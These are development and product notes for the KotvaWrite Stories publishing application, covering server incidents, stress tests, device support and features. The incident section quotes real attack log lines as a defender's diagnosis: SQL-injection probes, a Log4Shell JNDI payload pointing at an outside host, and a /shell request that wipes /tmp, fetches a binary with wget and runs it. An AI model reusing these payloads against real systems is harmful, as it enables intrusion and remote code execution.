KWS - Experimental - KotvaWrite Stories

Even when running on a single server KotvaWrite Stories could easily be left for a month without any special monitoring if the number of concurrent users is not overly high. An exception to this assumption may be made in mysterious cases where the memory and disk usage of a virtual server (Linux) momentarily rise quickly and stay in that state for some time. That could crash the application server on which the publishing application is installed. The consequences may not be too critical, as any unfinished database and file saves can/should be fixed and cleaned up semi-automatically, after which a simple restart of the application server might be sufficient to get things back to normal. However, if there is a large number of hacking attempts involved, some OS-level resources may be exhausted, such as the number of open files ("files that are currently being reviewed or modified").

By looking through the log file of the kernel of a Linux operating system in use, one may notice that the Java process has run out of memory on e.g. 15.10.2022, 18.8.2022 and 5.8.2022:

[Sat Oct 15 23:42:37 2022] Out of memory: Killed process 1295081 (java)

[Thu Aug 18 11:45:30 2022] Out of memory: Killed process 272984 (java)

[Fri Aug 5 06:11:36 2022] Out of memory: Killed process 4157049 (java)

To be a bit more specific, the application server on which the publishing application is installed is actually a Java servlet container running on a Java Virtual Machine (JVM), and it is configurable in which limits the associated Java process is allowed to use memory. Stress tests have shown that certain configurations for memory usage are enough - until for some reason they are not.

On the Linux operating system where the publishing application is installed, two APM (Application Performance Monitoring) agents are separately installed, which collect in real time information e.g. about both the operating system and the publishing application, which can then be viewed in a variety of ways in the web interfaces of the APM services (which might be New Relic and Datadog). In these out of memory cases, one and the same thing has always been found to be true: the amount of web traffic has not been a significant factor at a time when virtual process usage has grown by e.g. a factor of 20 and disk is used in a miraculously large amount in a short period of time. At such times, it is not surprising that the database queries might take more than ten seconds to run instead of the normal few milliseconds.

In addition, there is also an external service such as Papertrail, which can be used for redirecting log data from several sources such as the application server and the operating system, so that the log data does not have to be read in a Linux shell, but instead it can be viewed through a certain kind of web interface. A notion about hackers hava emerger from browsing the gathered logs. It seems that someone or some wannabe hackers etc. have done a lot of some kind of crude experimentation to get through defences of the operating system, application server and release application. This has been ongoing throughout 2022, but not once has there been an attempt to cause a Distributed Denial of Service (DDoS) attack, but e.g. rather a slow experimentation with usernames and passwords spread over a long period of time, with no more than a few dozen attempts per minute. That means every minute, every hour, every day and every month. Couldn't they just do something valid and successful the first time?

Contemplating the cause of the timing of out of memory errors tend to lead to a notion that the timing of some of the hacking attempts happen just seconds before the memory runs out, but could that have something do with not having dedicated servers? That means the same physical hardware resources are used by more than one datacenter client (in other words: a server is actually a so-called virtual server). Sometimes the actual hardware can cause failures, so the cause for problems could also be something other than what can be seen in the available logs and dashboards displaying visualized data. However, the data centre service provider said that was no anomaly to report at the time of the problematic out of memory events.

There are other explanations for out of memory errors and other strangely anomalous problems than those already mentioned. E.g. the application server might be way behind the latest version, and the same could apply to Java, the programming language used on the server side. There are separate settings for when and how the application server and Java clean up memory to remove things that are no longer needed, but they are rather generally left to their default settings. All of this is quite manageable, but may require lots of monitoring and testing to detect borderline cases.

The remainder of this article contains observations about certain out of memory event. And if this is where one can send greetings to the administration of the publishing application, it should be mentioned that some additional configuration could be done to ensure that the IP addresses wouldn't appear as 127.0.0.1 in the application server logs, but as the original IP addresses. Although, could General Data Protection Regulation (GDPR) have anything to say about this?

Plenty of login attempts in the logfile /var/log/messages:

Oct 15 22:52:42 snapshot-47300778-centos-2gb-hel1-1-final sshd[2479370]: Invalid user ktx from 5.51.84.107 port 55716

Oct 15 22:52:42 snapshot-47300778-centos-2gb-hel1-1-final sshd[2479370]: Received disconnect from 5.51.84.107 port 55716:11: Bye Bye [preauth]

Oct 15 22:52:42 snapshot-47300778-centos-2gb-hel1-1-final sshd[2479370]: Disconnected from invalid user ktx 5.51.84.107 port 55716 [preauth]

Oct 15 22:52:56 snapshot-47300778-centos-2gb-hel1-1-final sshd[2479454]: Invalid user postgres from 195.88.87.19 port 53396

Oct 15 22:52:56 snapshot-47300778-centos-2gb-hel1-1-final sshd[2479454]: Received disconnect from 195.88.87.19 port 53396:11: Bye Bye [preauth]

Oct 15 22:52:56 snapshot-47300778-centos-2gb-hel1-1-final sshd[2479454]: Disconnected from invalid user postgres 195.88.87.19 port 53396 [preauth]

Oct 15 22:55:25 snapshot-47300778-centos-2gb-hel1-1-final sshd[2480086]: Invalid user Test from 179.60.147.99 port 37284

Oct 15 22:55:25 snapshot-47300778-centos-2gb-hel1-1-final sshd[2480086]: Connection closed by invalid user Test 179.60.147.99 port 37284 [preauth]

Oct 15 23:13:34 snapshot-47300778-centos-2gb-hel1-1-final sshd[2484695]: Invalid user support from 193.106.191.50 port 49598

Oct 15 23:13:43 snapshot-47300778-centos-2gb-hel1-1-final sshd[2484695]: Connection closed by invalid user support 193.106.191.50 port 49598 [preauth]

Oct 15 23:29:58 snapshot-47300778-centos-2gb-hel1-1-final sshd[2488819]: Invalid user Test from 179.60.147.99 port 55870

Oct 15 23:29:58 snapshot-47300778-centos-2gb-hel1-1-final sshd[2488819]: Connection closed by invalid user Test 179.60.147.99 port 55870 [preauth]

Oct 15 23:39:43 snapshot-47300778-centos-2gb-hel1-1-final sshd[2491284]: Received disconnect from 92.255.85.69 port 26930:11: Bye Bye [preauth]

A few suspicious log lines here and there in the application server log file localhost_access_log:

127.0.0.1 - - [15/Oct/2022:23:03:39 +0200] "POST /core/.env HTTP/1.1" 404 764

127.0.0.1 - - [15/Oct/2022:23:03:39 +0200] "GET /core/.env HTTP/1.1" 404 764

127.0.0.1 - - [15/Oct/2022:23:03:40 +0200] "POST / HTTP/1.1" 200 13720

127.0.0.1 - - [15/Oct/2022:23:03:40 +0200] "POST /core/.env HTTP/1.1" 404 764

127.0.0.1 - - [15/Oct/2022:23:21:47 +0200] "GET /view.jsp?solutionid=539'A=0&writingid=12501 HTTP/1.1" 200 13477

127.0.0.1 - - [15/Oct/2022:23:21:52 +0200] "GET /view.jsp?solutionid=539&writingid=12501'A=0 HTTP/1.1" 200 15507

A few hundred variations to access non-installed web interface:

127.0.0.1 - - [15/Oct/2022:19:02:14 +0200] "GET /db/phpmyadmin/index.php?lang=en HTTP/1.1" 404 782

127.0.0.1 - - [15/Oct/2022:19:02:14 +0200] "GET /sql/phpmanager/index.php?lang=en HTTP/1.1" 404 783

127.0.0.1 - - [15/Oct/2022:19:02:14 +0200] "GET /mysql/pma/index.php?lang=en HTTP/1.1" 404 778

127.0.0.1 - - [15/Oct/2022:19:02:14 +0200] "GET /MyAdmin/index.php?lang=en HTTP/1.1" 404 772

127.0.0.1 - - [15/Oct/2022:19:02:14 +0200] "GET /sql/phpMyAdmin2/index.php?lang=en HTTP/1.1" 404 784

Trying to gain access by typing parameters and guessing addresses:

127.0.0.1 - - [15/Oct/2022:16:18:21 +0200] "GET /shell?cd+/tmp;rm+-rf+*;wget+81.161.229.46/jaws;sh+/tmp/jaws HTTP/1.1" 404 756

127.0.0.1 - - [15/Oct/2022:16:18:25 +0200] "GET /shell?cd+/tmp;rm+-rf+*;wget+81.161.229.46/jaws;sh+/tmp/jaws HTTP/1.1" 404 756

127.0.0.1 - - [15/Oct/2022:16:06:46 +0200] "GET /admin.pl HTTP/1.1" 404 759

195.96.137.4 - - [15/Oct/2022:16:06:46 +0200] "GET /admin.jsa HTTP/1.1" 404 760

127.0.0.1 - - [15/Oct/2022:11:57:08 +0200] "GET /linusadmin-phpinfo.php HTTP/1.1" 404 773

127.0.0.1 - - [15/Oct/2022:11:57:08 +0200] "GET /infos.php HTTP/1.1" 404 760

127.0.0.1 - - [15/Oct/2022:10:22:58 +0200] "GET /wp1/wp-includes/wlwmanifest.xml HTTP/1.1" 404 790

127.0.0.1 - - [15/Oct/2022:10:22:58 +0200] "GET /test/wp-includes/wlwmanifest.xml HTTP/1.1" 404 791

82.99.217.202 - - [15/Oct/2022:07:52:03 +0200] "GET /?id=%24%7Bjndi%3Aldap%3A%2F%2F218.24.200.243%3A8066%2FTomcatBypass%2FY3D HTTP/1.1" 200 13720

127.0.0.1 - - [15/Oct/2022:01:29:44 +0200] "POST /FD873AC4-CF86-4FED-84EC-4BD59C6F17A7 HTTP/1.1" 404 787

The second log on the application server (catalina) sometimes contains an experiment with imaginary weaknesses:

14-Oct-2022 04:01:50.622 INFO [http-nio2-8080-exec-21] org.apache.coyote.http11.Http11Processor.service Error parsing HTTP request header

Note: further occurrences of HTTP request parsing errors will be logged at DEBUG level.

java.lang.IllegalArgumentException: Invalid character found in method name [0x160x030x010x00{0x01;0x993Z0x15e}0x005/0x050x010x00...]. HTTP method names must be tokens

15-Oct-2022 14:21:12.637 INFO [http-nio2-8080-exec-6] org.apache.coyote.http11.Http11Processor.service Error parsing HTTP request header

Note: further occurrences of HTTP request parsing errors will be logged at DEBUG level.

java.lang.IllegalArgumentException: Invalid character found in method name [0x160x030x010x00{0xe40x920x88{#{*<0xc80xec0xfc}l0x820x85\0xcc0x1a0xc0/0x0050xc00x000x00...]. HTTP method names must be tokens

Differences in functionality across devices and browsers?

From a content production perspective, the publishing application has been developed on a "big screen and rollerball computers with physical keyboard first" basis, but time is sometimes spent ensuring that tablets and laptops with a sufficiently high resolution and size could also be suitable devices. For browsers, it seem to be easy to achieve an equal level of functionality, so the assumption has been taken that functionality is good even on more exotic ones, provided that it has been verified with the most common browsers.

The publishing application functions well and equally on at least Edge, Firefox, Chrome and Safari.

In terms of user experience, a 32-inch monitor at 1440p resolution connected to a deskop computer seems like something of a sweet spot, but on the other hand, the Apple iPad Pro 12.9" is a device that fits all the views of the publishing interface just snugly enough. A separate physical keyboard is still recommended. Some functions may not be available on mobile devices if there is no separate keyboard connected, as the alternative would be to put more switches and buttons on the screen, which would in turn change the user experience. In some situations, the use of a wheel mouse is recommended, but not necessarily necessary.

The Samsung Galaxy Tab S7 having a 11-inch screen has different dimensions to the iPad, which means that not all kinds of elements can fit side by side in portrait mode, but on the other hand the publishing interface adapts quickly to landscape mode. Also, using a browser in fullscreen always gives a bit more space, which is useful when using a laptop such as the ASUS ZenBook in all its 14-inch.

It has been tried to use the publishing application on a Sony Xperia Z3 Compact Tablet, which has only moderate power and a screen size of only 8 inches. Technically the publishing service works normally on it, but the different parts of a view of the user interface have to be placed one above another in accordance with the principles of responsive user interface design, so there's quite a bit scrolling required.

As for controllers, the Samsung Stylus Pen is very handy and recommended for compatible devices, offering not only very good sensitivity and accuracy, but also the hover feature that Apple Pencil lacks.

The instructions may refer to the using of the Ctrl key (Windows) in certain situations, but the Meta key (Mac) can also be used to access those functionalities.

When using or buying a laptop computer, it is recommended that it should have arrow buttons that aren't kind of squeezed to fit in their place as otherwise one needs to consciously think about using them, motor movement slows down and and the flow of thought gets interrupted unnecessarily.

Stress testing results using one virtual server

Virtual server processor load due to utilization

When there is not enough CPU power available, because of to the modest vcpu level of the virtual server, the load on the application server starts to show up in the CPU utilization, which is visualized here in the graph as it is shown in the Hetzner web interface. It shows that instantaneous CPU utilizations have been considerably higher than they usually are.

The same level of load can also be characterised in e.g. the Datadog monitoring service, which in this case shows how increasing the number of visitors per minute by a thousand, and again by a thousand, etc., has resulted in an ever-increasing load.

Excessive queuing of visitors causes delays in processing

test page: writing with a couple of dozen paragraphs of text and a few images

page loads: 8000 per minute

vcpu: 4

maxthreads: 3 - 4

survivability: when many visitors are not prepared to be handled very much at once, visitors have to wait longer to be processed, but even setting maxthreads higher by just one can be enough to stabilise response times

Front pages of solutions often cause only minimal load

test page: front page of a solution, about forty writings in a few collections of writings, shown using front type of plain structure

sivulataukset: 10000 per minuutti

vcpu: 4

survivability: uncached page loads with a smooth response time of about 110 ms, with max. visitors. 200 per second

Simultaneous processing of image uploads causes wavering in response times

test page: front page of a solution, about forty writings in a few collections of writings, shown using front type of plain structure

concurrency: throughout the test, the same virtual server receives and scales one image at a time to different sizes having 1920x1080 pixels

sivulataukset: 10000 per minute

vcpu: 4

survivability: slight wavering in response times, but no more than about 40 seconds, when maximum number of visitors is 200 per second

Thousands of writing collections can be loaded with lesser server resources

test page: all the about 30 writings from a writing collection loaded at once

page downloads: 4000 per minute

vcpu: 4

survivability: response times remain reasonably low, but there is constant chatter

A few tens of thousands of writings can be loaded per minute by increasing the processing power

testisivu: a writing having twenty paragraphs and few images

page loads: 35000 per minute

vcpu: 8

maxthreads: 140

survivability: steadily increasing the number of visitors increases the response times quite correlatively for a writing that would be loaded seperately in about 80 ms, and the response times do not stabilize, but 35000 page loads per minute with a good average loading speed of 250 ms is not a bad test result at all

Nearly ten thousand writing collections can be loaded by increasing the processing power

test page: a writing collection having 30 writings loaded at a time

page loads: 4000 - 9000 per minute

vcpu: 8

survivability: response times improve by almost 100 milliseconds compared to vcpu 4 and remain more or less stable, staying at that level up to 7000 page loads per minute, but 8000 starts to become more difficult for the server and 9000 was then more or less impossible to test without timeouts growing very high

Steady increase in visitor numbers makes it difficult to stabilise response times

test page: a writing collection having 10 writings loaded at a time

page loads: 10000 per minute

vcpu: 8

survivability: doubling the number of vcpus from 4 allows to pass the test that last for a minute, but a steady increase in the number of visitors increases the response times quite correlatively

Timeout errors may caused by configurating server imprudently

test page: a writing collection having 10 writings loaded at a time

vcpu: 4

survivability: when a Tomcat server is configured in an imprudent manner, it can become badly overloaded, with visitors being forced to queue up and some not getting fully processed

Automated messaging to customers and authenticated users

A wide range of situation reports, early warnings etc. could be collected, generated and communicated in abundance, and there are a variety of applications for their management, from Linux utilities to web applications. The usability and applicability of these will be explored.

It could be useful for the customer and the authenticated users to have some sense of e.g the current state of the server(s). Or at a higher level of abstraction, prior knowledge of the increased attention and consequences toward some solutions or writings in the publishing application could help in some kind of preparations.

Tighter UI

In the user settings, there is a Tighter UI option, which slightly reduces the size of almost all fonts in the user interface of a regular user and reduces the space taken up by some visual elements. This is useful e.g. on laptops that don't have a very large screen. On the iPad Pro and many other tablets, the Tighter UI setting may feel appropriate whether is enabled or not.

Studying mode

In the user settings there's enablable option for "studyind mode", which is only applicable in the text editing view. This adds a toggle button named "Studying mode" to that view, which, when turned on, imposes some editing restrictions on the writings, and the functionality of the table listing the writings becomes such that one can mark which writings are e.g. recommended to be studied next and which perhaps later. These markings are entirely visual, which means that they don't have exact defination. They can be set by Ctrl-clicking on the writing names.

These to-study markings are saved with the writings in the solution so that they are also stored in the backup of the relavant project and thus, one could prepare something to study for other and give them a copy of the backup file, which they could import to their instance of the publishing application. By turning off the study mode, the text editing view is restored to normal. With study mode enabled, all those markings can be cleared from writings of a writing collection by clicking on "Clear study markings".

Printable version of a solution

Any solution that has been prepared for online reading can be made into a PDF version with a single click of relevant button. The resulting PDF will contain a separate cover page, all collections of writings in their own parts with all printable contents. Page numbers in the footers with section information and before/after appecialpages are included. Images will be as well positioned as on the web, font choices are exactly right and otherwise results are generally just fine. Currently it is preferred to use content list type of "plain structure" as others like "presentation page" and blog-like would give unexpected results. Instead of the whole solutions, one can limit the use of the function to a selected writing collection.

This has been done in a completely different way to the previous attempt, where a TeX file was first generated, containing both styling and content, and then a PDF file was generated from it. Instead, the external service generates the PDF file from the same ingredients that browsers use to generate web pages, i.e. HTML code, CSS styling and JavaScript code. An important addition is the use of CSS3 Paged Media:

"CSS module specifies how pages are generated and laid out to hold fragmented content in a paged presentation. It adds functionality for controlling page margins, page size and orientation, and headers and footers, and extends generated content to enable page numbering and running headers / footers." (CSS Paged Media Module Level 3. W3C Working Draft, 18 October 2018.)

Many browsers have not implemented this standard and that is why printing directly from the browser does not provide optimal results as such, when the purpose is to include page numbering etc. E.g. the Firefox browser does not make much use of CSS Paged Media (since last tested), but Edge and Chrome do. However, a problem with using them is that they either include extra information like the date in the header and footer, or the header and footer contents have to be completely empty (the printing settings only have an either/or option). There is a button for making a printable version of the whole solution and icons for doing the same just for a writing collection.

Actually, as the external service that is supposed to be used for generating PDF files requires a fee to be paid, process is decreased by a one phase so that a user is served with a downloadable HTML file that contains all the mentioned "ingredients" and content. User can then use a browser to print it, if the browser has enough support for the CSS3 Paged Media.

There is only one adjustment for this in the adjustments of a solution, the font size multiplier. Choosing option "1.00" works appropriately when printing at A4 size, affecting all text sizes in a writing (headings, captions, etc.). This does not affect redirectlink writings, which are affected by the same setting on target solutions.

Export to a desktop publishing software

Desktop publishing software InDesign has for a long time allowed all its functionality to be controlled by ExtendScript, so after a while of exploring the InDesign's API, it became clear that it is indeed possible to be used to do what had already been envisioned and what was not dexterous enough with the LaTeX typesetting system. A backup of a project (zip package) contains all the essentials for creating an InDesign version, and in practice that is needed to do is to run a single script in InDesign that first which directory the decompressed files are in and then generates the same work in different form based on the available writings, style definitions etc.

Processing images in plentiful amounts

The image selections made in the "image assorting" view can be used in some other views by first storing essential information about them to the clipboard. In the "picture processing" view it means e.g. using the results of image analysis some ways. More than one analyse process can be run at a time. When using e.g. text recognition to an image or images, the results are shown after a short while and which can then be copied to use elsewhere, or be used right away by making a Google Search or Brave Search from a text selection, which results in displaying the few first web pages.

Posting to microblogs, social networks like Mastodon, Bluesky ym.

This is just a preliminary examining of what kind of e.g. coding it takes to send text with a image to a microblogging service where one might want to share something that was published. At least for Mastodon and Bluesky, the user would be required to create a user account, of course, and also to create an application in the settings of such to which a message can be sent for publishing programmatically (via an API).

Creating an application in the settings of a microblogging service is not a difficult operation in itself. It mainly requires giving it a name, after which an apikey or similar gets generated and which should then be stored to user settings of the publishing application.

It was also examined how readable the developer documentations are and if they leave many open questions.

Not necessarily relevant to a user of the publishing application, but some may be interested about the amount of code required to post to these microblogging services. Here are a couple of code snippets to give some idea.

Browser addons for fixing grammatical mistakes

To aid in fixing grammatical mistakes, detecting errors in using words etc. a browser add-on can be installed which, after registering as a user and logging in to the add-on, will check the text and mark parts of it that might need correcting. These add-ons probably don't need to be configured or adjusted. Changes can be accepted directly in the text editor.

As a kind of gateway theory, when registering as a user to such a service, one may discover that they offer other features such as AI-assisted text generation. In a way, this is the opposite of what this publishing application was intended to be, at least originally, i.e. primarily to create something yourself, with some additional functionality or external service e.g. as a helper and/or checker, if one wants to use them. It probably won't be a bad thing since e.g. rephrasing what is already written by AI is rather similar operation to language translation, which as a feature is already implemented.

Appealing reader with well-choosen writing names and mainimages

Well-choosen writing names and mainimages can be used to characterise the content of a writing in a way that appeals to the reader. Mainimages can also be used e.g. to set a tone, be sarcastic or create feelings that some writings are kind of related to each other.

AI-aided image analysis and image retrieval by text queries

In the "AI image search" view images can be searched by text after AI analysis of images. The images found are displayed in the same way as in the particular browsing view and can be drag'n'dropped for use in writings.

Before images can be searched using text they must first be analysed by an AI, of which there are several options to choose from. The AI analysis per image is at this stage intended to work in such a way that there is no need to send the images to another service and instead all the analysis is done on the server(s) that the client may already be using. This may impose limitations on how quickly images can be analysed, as some AI models require a lot of computational power from the processor.

Some AI models may take tens of seconds to analyse a few hundred images, others minutes. The results of image analysis are automatically stored in a database so that they are available for comparison when retrieving images using text queries.

The analyse results of the different AI models are not compatible with each other, but the user interface has been designed in a way that it provides clear indicators of which AI model has been used for which image containers.

After the first image analyses, the images can already be searched using text queries and if more images are added to image containers later, a clear indicator of the missing image analyses is presented, so one could know which image container the image analysis should be applied to. Background image analysis would also be an implementation option, but it has its risks, e.g. in terms of excessive server load.

Preliminary experiments show that the search results are pleasantly reliable, e.g. when searching for "city streets", the search results do match the query. The analysis results can be deleted per image container and per AI by Ctrl-clicking on the name of the AI model.

The results of the image analyses are stored in the same database management system that is already used for storing data such as writing related data, i.e. MariaDB. Newer versions of the database have the possibility of using vector data, which is very suitable for the purpose. In the past, the use of a separate vector database (e.g. Qdrant, Pinecone or Weavite) had been considered.

To be comtemplated later is to consider, if analysing of images could/should be done in a separate service with a large number of computing resources available. Currently, it is possibly to increase performance by directing computationally intensive operations away from a virtual server and toward e.g. a dedicated server. However, it seems that a single virtual server is rather sufficient to momentarily utilize an AI model without e.g. running out of memory on the server. Admittedly, currently AI-based image analysis uses images in their 360 pixels wide version. When using much larger ones, all the resources on a server would run out of quite quickly.

The results of AI image analysis are not stored in project backups, so if a project and its image catalogs are deleted, the related image analysis results would also be gone.

Screenshots from a tablet device to quick saves

Motivation, timing, etc., can be a reason for not starting something at the very moment when, while browsing the web, one notices something worth capturing that may have at least some usability for something. In such a case, a saved screenshot together with the address of the webpage seen should be enough to remind what one was about to write about.

An Android application has been developed on the Minimum Viable Product principle, intended for use only on Android tablets running at least Android 11. The application is logged in to with a username and session code, i.e. the login with password must have already taken place in order for the session code to be available and accessible.

The application acts as a receiver for the browser's share function, through which it receives information about the web page open in the browser. Based on this information, the application can open the same page inside that application, so that the user can then take the number of screenshots he needs from it. The screenshots are stored in the Pictures directory of the device and when send to the instance of the publishing application they are stord to the image container Quick saves (every user have such by default). The aim is to keep the transferred images in as high a resolution quality as possible, in order to allow for any cropping that may be necessary at a later stage. The Exif data fields of these images are used by including the address and name of the web page to them. After transferring these end up as the Description and Source for the related images in the Quick saves image container.

The same application can also be used to save simply links and their names, where the saving can target a choosen adequate set and its adequate.

Without using a separate application, one can take a screenshot of the page behind a link by, e.g. adding the link first to an adequate and then selecting the "Take a screenshot" function (see the "Screenshots" section of the instructions) or by taking a screenshot using the functionality of the mobile device or its browser.

On Android, one can take a screenshot of a web page, even a full page, by first typing "chrome://flags" in the address bar, selecting "screenshots for android v2" from the numerous options, and setting it to "enabled". This will enable the "long screenshot" function in the browser, which will save the screenshot taken on the device to a file (to the directory "DCIM/Screenshots", the name of the screenshot file will be formed according to the standard format).

On iPad, one can take a full-page or partial screenshot of a web page by first pressing the Home and Volume buttons briefly, and then choosing between a screen and full-page screenshot. Saving will produce a PDF file if one takes a full-page screenshot, otherwise a PNG file. Both options allow one to do cropping. This works equally well in e.g. Safari and Edge. Title of the web page is automatically contained in the image file name.

The Edge browser, which comes standard with Windows 11, has a basic web snippet feature that lets one take a full-page screenshot of a webpage, or crop it however one likes to. The image file format is always jpeg. Alternatively, one can install a browser extension such as FireShot.

To export pages and annotations from PDF files to an image file, there are PDF reader applications available with an option to directly save a page as an image file to a selected location using the Share function. Sometimes they do not offer to produce a very high resolution image, so a separate application, perhaps costing a couple of euros, specifically designed for this purpose may be a much better option (e.g. selectable image size, pages, file type, etc.). Once the images have been created from the PDF file, the importing view of the publishing application open in a browser of the same device can then be used to import the saved images for use of publishing application's solution or an adequateset.

Useful types of particulars under consideration

As well as avoiding causing memory burden on the user when using a publishing application, the intention is not to cause memory burden in terms of cost or manageability of the external services or restrictions. While some external services are only available during the content producing phase, some map services are partially available on a continuous basis if some public domain works contain interactive maps, and are not always unlimited free of charge. To some extent, this is also a business decision, i.e. what can be promised to the client of the publishing application, etc.

Using maps in your writing is a spectacular way to clarify location. An external API is used for reverse geocoding purposes to convert e.g. a given location like a city name into map coordinates. There are a few different choices as a map service to use.

Third-party software components are used to display maps, and initial tryouts in implementing them have given rise to a wide range of ideas on how to allow the user to make use of the maps. Possibilities include the use of stylistically different map tiles, elements to be added on top of the map and route guidance. Another consideration is that the use of map services may be subject to a fee up to a certain level of use and that the number of access times per some time period may be limited. The user must obtain a user acccount for the map service API by registering as a user and then locate the required API key, which is placed in the user-specific settings of the publishing application.

Other particulars under consideration include podcasts, for which there are a few dozen hosting services that offer a supplementary web-based audio player that can be embedded on a web page. Whether to make all of these available, or just some of them? Can such decisions be made more than once? Audio files can be used while waiting for a decision to be made.

Transcribes of audio recordings

It's easier to browse and understand audio recordings when one can simultaneously follow as text what is being said, what was said before and what will be said after a moment. Related to this there is the WebVTT (Web Video Text Tracks) standard, which, despite its name, also works with audio files and can be characterised as the representation of the text used in synchronisation with other media such as audio or video.

Making a VTT file from an audio recording is a form of phonetic transcription, or more precisely, transcribing. There are several different online applications for this purpose, but not all of them recognise the Finnish language. They vary widely in pricing, some offer some free transcribing time per month and are very likely to produce different quality.

One could use Google's Speech-to-Text API, which can be accessed directly from the Google Cloud console using a graphical user interface. Basically, an audio file is given as input, a few choices affecting quality is made and then a short moment is waited through. After that download option becames available which can be used to retrieve a SRT file containing the transcribed audio. SRT files are almost identical to the WebVTT files, both being human- and machine-readable text files. Howevery a SRT file needs to be converted to a VTT file, before it can be used. This conversion requires a separate application, which can be a Windows application or, alternatively, one can use any of the many conversion services available on the web (try searching with "convert srt to vtt").

To the publishing application, user does not need to provide any other input other than the url to audio file and url to the vtt file. These are used to generate an audio player, which displays an interactive transcription below it. Here interactivity means that when clicking part of transcribe text, player changes the position where from audio continues to play. As a listener progress through the audio, part of the transcribe text indicates which part of the audio user is currently listening to.

The VTT file must be located in a place that allows distribution of such files either everywhere or to the server used by the publishing application. It is recommended that both the audio file and the vtt file are placed on the CDN Storage provided by the CDN service you are already require to use, as the relevant Cross-Origin Resource Sharing (CORS) settings are easily found in its configuration.

Enabling the transcribe feature requires turning on the experimental functions in the user-spesific settings. Created audio-like particulars remain intact even after the experimental functions are turned off meaning that they will also e.g. get put to backups. In this case, turning on/off the experimental functions will practically just show/hide some interface elements.

Multi-user collaboration

It has been possible to grant editing rights on a project-by-project basis to users of the publishing application instance for a long time, but selecting co-editing users requires turning the experimental features on for a moment. Editing user permissions are strictly predefined and allow editing almost everything in a project except deleting it. Adequate sets, however, cannot be co-edited.

One could also share permissions by sharing the session code after login, but then one would granted access to everything that can be done with that user account.

In the internal functions of the publishing application, the possibility of real-time machine-to-machine communication between users of the publishing application on two different terminals has been prepared, but has not been used for the purpose of co-editing.

Authors markings are also just an intention, which cannot be enabled even by turning on the experimental features. The idea has been to allow the user to add authors to both their own writings and writings belonging to projects to which he has received editing rights. They will be used in contexts in which the authors' details etc. will be displayed. E.g. in the fine-tuning view, you can add the contributors placeholder to the writing, which will be used to generate author information in the final version of the writing. The function for this can be found in the Tools menu ("Functional embed: contributors"). That placeholder can be converted to plain text by Alt-clicking.

These "authors" can be created in the Authors tab of the user preferences, and they can be transferred from one user to another if necessary. They can be used to communicate to readers the role played by each author in the creation of the writing. Later on, images can also be used, but at this stage these authors are text only. Users with editing rights will not be able to remove authors other than their own.

These authors are loosely decoupled from writings in such a way that if a project is first exported and then deleted from among other projects, the relationship between them is broken. The backup will only include a hint of the author's name, but on the other hand there will be a semi-automatic function in the Usabilities view to reconnect authors.

Past riskiness of the text editor component

The text editor component has long been perceived as something of a risk, as there seemed to be no newer version coming from its developer, even though it had been promised several years ago. Version 1.3.7 was released in September 2019 and the first beta version of the next version was not released until December 2023. From then on, it was another six months and many additional changes and bug fixes before it could be perceived as stable upgrade that might be worth trying.

One of long-standing problems was the Undo/Redo function causing the text editor content to become disordered and the cursor to jump oddly to wrong places. That seems be fixed. Fortunately, there are not many other software components like this, so switch to another one wasn't made.

The text editor component has been used, among other things, for its extensibility, as it is convenient to prepare new elements for it to use in writings (e.g. placeholders) and the well-functioning Undo/Redo are very important when there are many different styles in a writing.

Earlier versions

KotvaWrite Stories and KotvaWrite Explanations (2017)

The main purpose of the KotvaWrite has been to make it possible to carry out a large number of layout experiments and adjustments to literary works in a short enough time so that the time spent waiting does not feel long and meaningful results can be reached effortlessly. However, the typesetting system (XeTeX) does not keep up with such a fast pace and that significantly guided the product development and thus it was decided to split it into two different product lines, one (KotvaWrite Stories) producing HTML-based works with a wider range of style options and the other (KotvaWrite Explanations) producing both PDF- and HTML-based works, but with slightly more limited layout and adjustment options.

JDK 1.8, JPA, REST, EclipseLink, Eclipse, Visual Paradigm for UML, Foundation, Backgrid, Backbone, Underscore.js, SASS, jQuery, HTML5, CSS 2.1/3, MySQL, MariaDB, MongoDB, JavaScript, NoSQL, JNDI, Tomcat 8, Digital Ocean, Putty, Linux command line tools, TeX, LaTeX, XeLaTeX, Loadster, NeoLoad, New Relic, Datadog, Nginx, HAProxy, Parse API, UML, Git, JUnit, Photoshop, MySQL Workbench

Process for generating preview images for a single writing

Java-based code generates a .tex file on the server side and then calls xelatex.exe or pdflatex.exe to produce a .pdf file having its structure and styling mostly affected by the settings made in the web interface. The XeTeX typesetting system makes its best effort to compile the final results on one run, but sometimes it needs to be instructed make another set of calculations after first run. Apache PDFBox is used to generate thumbnails of individual pages for viewing in the web interface.

KotvaWrite 2

It is still a web application for producing book-length, online readable works. The application consists of four parts that can be used for these:

Importing of material to be used in writings from multitude of sources.
Arranging material and writings.
Text writing and editing, compiling writings into a literary work that gets generated on the basis of parameters that affect layout, styling and presentation.

The most significant renovation compared to the previous version has happened at the interface level as it has been completely redesigned. The application has been designed using responsive design to substantially improve the user experience. Some additional features have been added since then (including an automatically generated PDF file and fine-tuning of the print version of the HTML version).

Java EE 6, JPA, REST, EclipseLink, Eclipse, Oxygen XML, Visual Paradigm for UML, Foundation, Backgrid, Backbone, SASS, jQuery, HTML5, CSS 2.1, MySQL, OrientDB, XML, iText, JavaScript, NoSQL, JNDI, Tomcat 7, AppFog, UML, Mylyn, Git, JUnit, Photoshop, MySQL Workbench

KotvaWrite v1.0

KotvaWrite is a useful web application for creating and editing text-based material that can take a book-like structure (in essence, multiple writings placed in collections that can be combined into a larger whole), which can be exported as a PDF file or made readable by others in HTML format. Text can be accompanied by images, illustrations, drawings and certain other types of "attachments" often seen in blog posts.

Java EE 6, JPA, REST, EclipseLink, Eclipse, Oxygen XML, Visual Paradigm for UML, Dojo, jQuery, HTML5, CSS 2.1, MySQL, OrientDB, XML, JavaScript, NoSQL, JNDI, Tomcat 7, AppFog, UML, Mylyn, Git, JUnit, Photoshop, MySQL Workbench

Ancoaarmade (predecessor of KotvaWrite)

The idea was to develop an web application that would serve its users' in needs like: writing down observations, self-learning, organising and publishing information, producing information, organising thoughts and remembering things. The final product will be a set of writings, which can be made public if desired, and which may consist of various collected or generated materials such as video clips, diagrams, pictures, drawings, etc. illustrative material. Material can be brought in from external data sources or from a mobile phone.

